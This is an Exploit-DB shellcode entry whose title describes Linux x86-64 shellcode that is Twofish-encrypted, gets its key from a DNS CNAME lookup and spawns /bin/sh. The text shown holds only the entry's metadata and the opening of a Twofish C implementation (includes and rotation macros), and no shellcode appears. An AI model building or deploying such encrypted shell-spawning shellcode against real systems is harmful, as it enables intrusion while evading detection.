Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

EDB-ID: 43956
Author: 0x4ndr3
Published: 2018-02-02
Type: Shellcode
Platform: Linux_x86-64
Aliases: N/A
Tags: N/A

/*
   Optimized Twofish C implementation by Drew Csillag:
   Partially re-written by Andre Lima ( to encrypt/decrypt variable length Linux x86_64 shellcode.

   compiler is gcc(egcs-2.91.66)
   flags are -O3 -fomit-frame-pointer -Wall
   Processor is 233Mhz Pentium II (Deschutes)
   OS is Linux 2.2.16
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "tables.h"
#define u32 unsigned int
#define BYTE unsigned char
#define RS_MOD 0x14D
#define RHO 0x01010101L

/* gcc is smart enough to convert these to roll instructions. If you want
   to see for yourself, either do gcc -O3 -S, or change the |'s to +'s and
   see how slow things get (you lose about 30-50 clocks) :). */
#define ROL(x,n) (((x) << ((n) & 0x1F)) | ((x) >> (32-((n) & 0x1F))))
#define ROR(x,n) (((x) >> ((n) & 0x1F)) | ((x) << (32-((n) & 0x1F))))

#if BIG_ENDIAN == 1
#define BSWAP(x) (((ROR(x,8) & 0xFF00FF00) | (ROL(x,8) & 0x00FF00FF)))
#else
#define BSWAP(x) (x)
#endif